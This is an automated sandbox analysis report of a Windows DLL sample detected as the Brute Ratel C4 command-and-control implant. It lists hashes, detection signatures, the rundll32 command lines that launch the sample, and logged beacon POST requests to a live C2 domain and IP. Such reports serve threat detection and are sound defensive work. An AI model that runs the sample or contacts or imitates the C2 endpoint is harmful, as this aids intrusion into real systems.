Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
IMS64.dll.dll

Overview

General Information

Sample name:IMS64.dll.dll
(renamed file extension from exe to dll)
Original sample name:IMS64.dll.exe
Analysis ID:1500442
MD5:4a10fb513a346ffdca884fa74cf18015
SHA1:623b8046938fd54fae54957ece8c7ff40653217b
SHA256:079e3171048286472cff2b0267cd2d6a90bf9d7f45255f48031bf4bf2ac3b0b4
Tags:exejavaforyouedu-in
Infos:

Detection

BruteRatel
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected BruteRatel
AI detected suspicious sample
Modifies the context of a thread in another process (thread injection)
Sets debug register (to hijack the execution of another thread)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to query network adapater information
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found large amount of non-executed APIs
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • loaddll64.exe (PID: 7308 cmdline: loaddll64.exe "C:\Users\user\Desktop\IMS64.dll.dll" MD5: 763455F9DCB24DFEECC2B9D9F8D46D52)
    • conhost.exe (PID: 7316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7360 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\IMS64.dll.dll",#1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • rundll32.exe (PID: 7396 cmdline: rundll32.exe "C:\Users\user\Desktop\IMS64.dll.dll",#1 MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 7372 cmdline: rundll32.exe C:\Users\user\Desktop\IMS64.dll.dll,main MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 7500 cmdline: rundll32.exe "C:\Users\user\Desktop\IMS64.dll.dll",main MD5: EF3179D498793BF4234F708D3BE28633)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Brute Ratel C4, BruteRatelBrute Ratel is a a Customized Command and Control Center for Red Team and Adversary SimulationSMB and TCP payloads provide functionality to write custom external C2 channels over legitimate websites such as Slack, Discord, Microsoft Teams and more.Built-in debugger to detect EDR userland hooks.Ability to keep memory artifacts hidden from EDRs and AV.Direct Windows SYS calls on the fly.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.brute_ratel_c4
No configs have been found
SourceRuleDescriptionAuthorStrings
Process Memory Space: rundll32.exe PID: 7500JoeSecurity_BruteRatel_2Yara detected BruteRatelJoe Security
    No Sigma rule has matched
    No Suricata rule has matched

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: IMS64.dll.dllReversingLabs: Detection: 28%
    Source: IMS64.dll.dllVirustotal: Detection: 26%Perma Link
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.4% probability
    Source: unknownHTTPS traffic detected: 43.206.237.192:443 -> 192.168.2.4:49731 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 43.206.237.192:443 -> 192.168.2.4:49730 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 43.206.237.192:443 -> 192.168.2.4:49734 version: TLS 1.2
    Source: IMS64.dll.dllStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT

    Networking

    barindex
    Source: C:\Windows\System32\rundll32.exeNetwork Connect: 43.206.237.192 443Jump to behavior
    Source: Joe Sandbox ViewASN Name: LILLY-ASUS LILLY-ASUS
    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
    Source: global trafficHTTP traffic detected: POST /rofl/admin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: javaforyouedu.inContent-Length: 538Connection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: POST /rofl/admin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: javaforyouedu.inContent-Length: 538Connection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: POST /rofl/admin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: javaforyouedu.inContent-Length: 96Connection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: POST /rofl/admin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: javaforyouedu.inContent-Length: 96Connection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: POST /rofl/admin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: javaforyouedu.inContent-Length: 538Connection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: POST /rofl/admin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: javaforyouedu.inContent-Length: 96Connection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: POST /rofl/admin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: javaforyouedu.inContent-Length: 96Connection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: POST /rofl/admin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: javaforyouedu.inContent-Length: 96Connection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: POST /rofl/admin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: javaforyouedu.inContent-Length: 96Connection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: POST /rofl/admin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: javaforyouedu.inContent-Length: 96Connection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: POST /rofl/admin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: javaforyouedu.inContent-Length: 96Connection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: POST /rofl/admin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: javaforyouedu.inContent-Length: 96Connection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: POST /rofl/admin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: javaforyouedu.inContent-Length: 96Connection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: POST /rofl/admin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: javaforyouedu.inContent-Length: 96Connection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: POST /rofl/admin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: javaforyouedu.inContent-Length: 96Connection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: POST /rofl/admin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: javaforyouedu.inContent-Length: 96Connection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: POST /rofl/admin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: javaforyouedu.inContent-Length: 96Connection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: POST /rofl/admin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: javaforyouedu.inContent-Length: 96Connection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: POST /rofl/admin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: javaforyouedu.inContent-Length: 96Connection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: POST /rofl/admin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: javaforyouedu.inContent-Length: 96Connection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: POST /rofl/admin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: javaforyouedu.inContent-Length: 96Connection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: POST /rofl/admin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: javaforyouedu.inContent-Length: 96Connection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: POST /rofl/admin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: javaforyouedu.inContent-Length: 96Connection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: POST /rofl/admin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: javaforyouedu.inContent-Length: 96Connection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: POST /rofl/admin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: javaforyouedu.inContent-Length: 96Connection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: POST /rofl/admin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: javaforyouedu.inContent-Length: 96Connection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: POST /rofl/admin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: javaforyouedu.inContent-Length: 96Connection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: POST /rofl/admin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: javaforyouedu.inContent-Length: 96Connection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: POST /rofl/admin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: javaforyouedu.inContent-Length: 96Connection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: POST /rofl/admin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: javaforyouedu.inContent-Length: 96Connection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: POST /rofl/admin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: javaforyouedu.inContent-Length: 96Connection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: POST /rofl/admin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: javaforyouedu.inContent-Length: 96Connection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: POST /rofl/admin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: javaforyouedu.inContent-Length: 96Connection: Keep-AliveCache-Control: no-cache
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficDNS traffic detected: DNS query: javaforyouedu.in
    Source: unknownHTTP traffic detected: POST /rofl/admin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: javaforyouedu.inContent-Length: 538Connection: Keep-AliveCache-Control: no-cache
    Source: rundll32.exe, 00000003.00000002.4122414649.000001CDED202000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2024553634.000001CDED19F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4122414649.000001CDED19F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2337575131.000001CDED19F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2337575131.000001CDED207000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4122385364.000001FB0D930000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3711576277.000001FB0D930000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2640820421.000001FB0D995000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2024250096.000001FB0D935000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2336710000.000001FB0D995000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.3122503909.000001E8C6CB6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4122196214.000001E8C6CB6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4122196214.000001E8C6C56000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.3851106609.000001E8C6CB6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.3597962223.000001E8C6CB6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.3385284343.000001E8C6CB6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://javaforyouedu.in/
    Source: rundll32.exe, 00000003.00000003.2024553634.000001CDED19F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4122414649.000001CDED19F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2337575131.000001CDED19F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://javaforyouedu.in/-
    Source: rundll32.exe, 00000004.00000003.1716599072.000001FB0D991000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1717104370.000001FB0D991000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://javaforyouedu.in/H
    Source: rundll32.exe, 00000005.00000003.2318339849.000001E8C6CB6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2483934674.000001E8C6CB6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://javaforyouedu.in/O
    Source: rundll32.exe, 00000005.00000002.4122196214.000001E8C6C85000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4122196214.000001E8C6C8B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2483934674.000001E8C6CB6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.3385284343.000001E8C6CB6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://javaforyouedu.in/rofl/admin
    Source: rundll32.exe, 00000005.00000003.2483934674.000001E8C6C8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://javaforyouedu.in/rofl/admin#
    Source: rundll32.exe, 00000005.00000003.2318339849.000001E8C6CB6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://javaforyouedu.in/rofl/admin2
    Source: rundll32.exe, 00000003.00000003.3145988406.000001CDED22A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://javaforyouedu.in/rofl/admin4
    Source: rundll32.exe, 00000003.00000002.4122414649.000001CDED1DA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2337575131.000001CDED1DB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2024553634.000001CDED1DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://javaforyouedu.in/rofl/admin8x
    Source: rundll32.exe, 00000005.00000003.3122503909.000001E8C6CB6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.3851106609.000001E8C6CB6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2483934674.000001E8C6CB6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://javaforyouedu.in/rofl/admin9
    Source: rundll32.exe, 00000004.00000003.3711576277.000001FB0D918000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4122385364.000001FB0D918000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://javaforyouedu.in/rofl/admin=
    Source: rundll32.exe, 00000004.00000002.4122385364.000001FB0D994000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.3597962223.000001E8C6CB6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.3385284343.000001E8C6CB6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://javaforyouedu.in/rofl/adminA
    Source: rundll32.exe, 00000005.00000003.3597962223.000001E8C6CB6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2483934674.000001E8C6CB6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://javaforyouedu.in/rofl/adminD
    Source: rundll32.exe, 00000004.00000003.3711576277.000001FB0D994000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://javaforyouedu.in/rofl/adminL
    Source: rundll32.exe, 00000005.00000003.3122503909.000001E8C6CD6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2318339849.000001E8C6CD6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2484020877.000001E8C6CD6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1958211641.000001E8C6CD5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.3851202401.000001E8C6CD6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.3385381204.000001E8C6CD6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1958118482.000001E8C6CB6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.3597962223.000001E8C6CD6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4122196214.000001E8C6CD6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://javaforyouedu.in/rofl/adminM
    Source: rundll32.exe, 00000005.00000003.3122503909.000001E8C6CB6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.3851106609.000001E8C6CB6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.3597962223.000001E8C6CB6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.3385284343.000001E8C6CB6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://javaforyouedu.in/rofl/adminN
    Source: rundll32.exe, 00000004.00000003.3711576277.000001FB0D966000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://javaforyouedu.in/rofl/adminYcM(
    Source: rundll32.exe, 00000005.00000003.2483934674.000001E8C6C85000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1958118482.000001E8C6C85000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.3122503909.000001E8C6C85000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.3597962223.000001E8C6C85000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2318339849.000001E8C6C85000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.3385284343.000001E8C6C85000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.3851106609.000001E8C6C85000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4122196214.000001E8C6C85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://javaforyouedu.in/rofl/admini
    Source: rundll32.exe, 00000004.00000003.3711576277.000001FB0D918000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4122385364.000001FB0D918000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://javaforyouedu.in/rofl/admink
    Source: rundll32.exe, 00000004.00000003.3711716551.000001FB0D9B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2640820421.000001FB0D995000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2640866940.000001FB0D9B0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2024200405.000001FB0D995000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2853714968.000001FB0D994000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2336772158.000001FB0D9B0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4122385364.000001FB0D994000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2336710000.000001FB0D995000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2853768398.000001FB0D9B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://javaforyouedu.in/rofl/admino
    Source: rundll32.exe, 00000005.00000002.4122196214.000001E8C6CB6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://javaforyouedu.in/rofl/admins
    Source: rundll32.exe, 00000003.00000002.4122414649.000001CDED1DA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2337575131.000001CDED1DB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2024553634.000001CDED1DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://javaforyouedu.in/rofl/adminux
    Source: rundll32.exe, 00000004.00000003.3711576277.000001FB0D966000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://javaforyouedu.in/rofl/adminxcn(
    Source: rundll32.exe, 00000005.00000003.3597962223.000001E8C6C8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://javaforyouedu.in/rofl/adminy
    Source: rundll32.exe, 00000004.00000003.1716599072.000001FB0D991000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1717104370.000001FB0D991000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://javaforyouedu.in/rofl/admin~
    Source: rundll32.exe, 00000004.00000002.4122385364.000001FB0D930000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3711576277.000001FB0D930000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2024250096.000001FB0D935000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://javaforyouedu.in/wA
    Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
    Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
    Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
    Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
    Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
    Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
    Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
    Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
    Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
    Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
    Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
